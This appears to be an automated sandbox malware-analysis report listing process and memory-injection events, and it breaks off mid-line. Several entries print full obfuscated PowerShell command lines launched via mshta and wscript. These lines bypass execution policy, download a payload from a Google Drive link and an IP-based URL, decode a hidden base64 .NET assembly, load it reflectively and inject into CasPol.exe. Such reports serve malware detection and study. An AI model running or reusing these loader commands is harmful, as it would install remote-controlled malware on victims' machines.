Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxr